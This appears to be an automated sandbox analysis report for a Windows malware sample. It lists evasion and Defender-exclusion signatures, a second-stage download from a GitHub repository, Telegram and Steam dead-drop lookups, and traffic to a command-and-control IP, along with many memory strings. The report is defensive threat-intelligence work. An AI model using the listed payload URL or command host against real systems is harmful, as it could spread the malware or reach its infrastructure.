Windows Analysis Report
YYjRtxS70h.exe

Overview

General Information

Sample name: YYjRtxS70h.exe
renamed because original name is a hash value
Original sample name: 5a59ce92b07de68c0be8fbd7944214e2.exe
Analysis ID: 1579768
MD5: 5a59ce92b07de68c0be8fbd7944214e2
SHA1: b0536d674552c3a11a881b154b668af1b5222641
SHA256: e09ff2bd97040748812f0434e277b6623ac9aff565fc11003f9abfeeabe9110a
Tags: exe, user-abuse_ch

Detection

Score: 88
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
PE file has a writeable .text section
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Suricata IDS alerts with low severity for network traffic
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

AV Detection

Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe ReversingLabs: Detection: 63%
Source: YYjRtxS70h.exe Virustotal: Detection: 62%
Source: YYjRtxS70h.exe ReversingLabs: Detection: 65%
Source: Submitted Sample Integrated Neural Analysis Model: Matched 99.3% probability
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe Joe Sandbox ML: detected
Source: YYjRtxS70h.exe Joe Sandbox ML: detected
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe Code function: 14_2_0041FC3B CryptStringToBinaryA,CryptStringToBinaryA, 14_2_0041FC3B
Source: unknown HTTPS traffic detected: 20.233.83.145:443 -> 192.168.2.8:49708 version: TLS 1.2
Source: unknown HTTPS traffic detected: 185.199.110.133:443 -> 192.168.2.8:49709 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.8:49710 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.8:49711 version: TLS 1.2
Source: YYjRtxS70h.exe Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: C:\Users\danie\source\repos\Qwest\Qwest\obj\Debug\Qwest.pdb source: YYjRtxS70h.exe
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe Code function: 14_2_0041E359 FindFirstFileA,FindFirstFileA, 14_2_0041E359
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe Code function: 14_2_00420370 FindFirstFileA,FindFirstFileA, 14_2_00420370
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe Code function: 14_2_0042498B FindFirstFileA,FindFirstFileA, 14_2_0042498B
Source: C:\Users\user\Desktop\YYjRtxS70h.exe Code function: 4x nop then mov dword ptr [ebp-18h], 00000000h 0_2_02832309
Source: global traffic HTTP traffic detected: GET /olosha1/pockket/raw/refs/heads/main/jtkhikadjthsad.exe HTTP/1.1 Host: github.com Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /olosha1/pockket/refs/heads/main/jtkhikadjthsad.exe HTTP/1.1 Host: raw.githubusercontent.com Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /m3wm0w HTTP/1.1 Host: t.me Connection: Keep-Alive Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /profiles/76561199804377619 HTTP/1.1 Host: steamcommunity.com Connection: Keep-Alive Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /m3wm0w HTTP/1.1 Host: t.me Connection: Keep-Alive Cache-Control: no-cache Cookie: stel_ssid=d6d3627e300141e072_9285031639468439323
Source: global traffic HTTP traffic detected: GET /profiles/76561199804377619 HTTP/1.1 Host: steamcommunity.com Connection: Keep-Alive Cache-Control: no-cache Cookie: sessionid=a683bfea8aad978e31b0518e; steamCountry=US%7C185ce35c568ebbb18a145d0cabae7186
Source: Joe Sandbox View IP Address: 104.102.49.254 104.102.49.254
Source: Joe Sandbox View IP Address: 20.233.83.145 20.233.83.145
Source: Joe Sandbox View JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox View JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: Network traffic Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.8:49712 -> 37.27.43.98:443
Source: Network traffic Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.8:49716 -> 37.27.43.98:443
Source: Network traffic Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.8:49721 -> 37.27.43.98:443
Source: unknown TCP traffic detected without corresponding DNS query: 37.27.43.98
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe Code function: 14_2_00418024 InternetReadFile, 14_2_00418024
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A12000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.cloudflare.steamstatic.com/ https://cdn.cloudflare.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.cloudflare.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2565990031.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Content-Security-Policydefault-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.cloudflare.steamstatic.com/ https://cdn.cloudflare.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.cloudflare.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/;) equals www.youtube.com (Youtube)
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.1837734458.0000000000A78000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Content-Security-Policydefault-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.cloudflare.steamstatic.com/ https://cdn.cloudflare.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.cloudflare.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/;a( equals www.youtube.com (Youtube)
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2522942160.0000000000A78000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: t-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)
Source: global traffic DNS traffic detected: DNS query: github.com
Source: global traffic DNS traffic detected: DNS query: raw.githubusercontent.com
Source: global traffic DNS traffic detected: DNS query: t.me
Source: global traffic DNS traffic detected: DNS query: steamcommunity.com
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2565990031.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201799460.0000000000A98000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A45000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A12000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://127.0.0.1:27060
Source: powershell.exe, 00000005.00000002.1561429732.0000000007723000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.mi
Source: powershell.exe, 00000005.00000002.1563697900.00000000086C2000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1610889169.000000000780F000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1703471346.0000000006ED0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.micro
Source: powershell.exe, 00000005.00000002.1563697900.00000000086C2000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1610889169.000000000784D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.microsoft
Source: YYjRtxS70h.exe, 00000000.00000002.1791353691.0000000002A4F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://github.com
Source: YYjRtxS70h.exe, 00000000.00000002.1791353691.0000000002A4F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://github.comd
Source: powershell.exe, 00000005.00000002.1558683585.0000000006089000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1606744691.00000000061B9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1672248672.0000000005F28000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 0000000D.00000002.1655620114.0000000005015000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: YYjRtxS70h.exe, 00000000.00000002.1791353691.0000000002A92000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://raw.githubusercontent.com
Source: YYjRtxS70h.exe, 00000000.00000002.1791353691.0000000002A92000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://raw.githubusercontent.comd
Source: powershell.exe, 00000005.00000002.1555257254.0000000005177000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1596759724.00000000052A6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1655620114.0000000005015000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: YYjRtxS70h.exe, 00000000.00000002.1791353691.00000000029B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1567151650.0000000004414000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1555257254.0000000005021000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1619557449.000000000480D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1596759724.0000000005151000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1695247796.0000000004679000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1655620114.0000000004EC1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000005.00000002.1555257254.0000000005177000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1596759724.00000000052A6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1655620114.0000000005015000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2522942160.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2748505795.0000000000493000.00000004.00000001.01000000.00000008.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2178005887.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.14.dr, 76561199804377619[1].htm0.14.dr String found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2522942160.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2748291843.0000000000193000.00000004.00000010.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2748505795.0000000000493000.00000004.00000001.01000000.00000008.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2178005887.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.14.dr, 76561199804377619[1].htm0.14.dr String found in binary or memory: http://store.steampowered.com/privacy_agreement/
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2522942160.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2748505795.0000000000493000.00000004.00000001.01000000.00000008.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2178005887.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.14.dr, 76561199804377619[1].htm0.14.dr String found in binary or memory: http://store.steampowered.com/subscriber_agreement/
Source: powershell.exe, 0000000D.00000002.1655620114.0000000005015000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 0000000A.00000002.1610889169.000000000780F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.microsoft.coU
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.1837635638.0000000000A3A000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2522942160.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2565990031.0000000000A9A000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2748505795.0000000000493000.00000004.00000001.01000000.00000008.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201799460.0000000000A91000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2178005887.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.14.dr, 76561199804377619[1].htm0.14.dr String found in binary or memory: http://www.valvesoftware.com/legal.htm
Source: 76561199804377619[1].htm0.14.dr String found in binary or memory: https://37.27.43.98
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2178005887.0000000000A47000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2523079878.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2522942160.0000000000A45000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A47000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A41000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://37.27.43.98/
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A41000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://37.27.43.98/(
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A47000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://37.27.43.98/5
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A41000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://37.27.43.98/://Z
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A47000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://37.27.43.98/A
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2522942160.0000000000A45000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://37.27.43.98/B_F
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2178005887.0000000000A47000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A47000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A41000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://37.27.43.98/T
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A47000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://37.27.43.98/icate
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A41000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://37.27.43.98/n
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A31000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://37.27.43.98/r
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2178005887.0000000000A47000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2522942160.0000000000A45000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A47000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A41000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://37.27.43.98/rG8
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A41000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://37.27.43.98/s
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2522942160.0000000000A45000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://37.27.43.98/v
Source: powershell.exe, 00000007.00000002.1619557449.0000000004839000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1695247796.00000000046A5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore6LR
Source: powershell.exe, 00000003.00000002.1567151650.00000000043DE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1567151650.00000000043F2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1555257254.0000000005021000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1619557449.0000000004848000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1596759724.0000000005151000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1695247796.00000000046B8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1655620114.0000000004EC1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore6lB
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A31000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://api.P
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A12000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://api.steampowered.com/
Source: 76561199804377619[1].htm0.14.dr String found in binary or memory: https://avatars.cloudflare.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2565990031.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201799460.0000000000A98000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A45000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A12000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://broadcast.st.dl.eccdnx.com
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2565990031.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201799460.0000000000A98000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A45000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A12000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A31000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cdn.cloudflare.steamstatic.com/steamcommunity/public/assets/
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A12000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://checkout.steampowered.com/
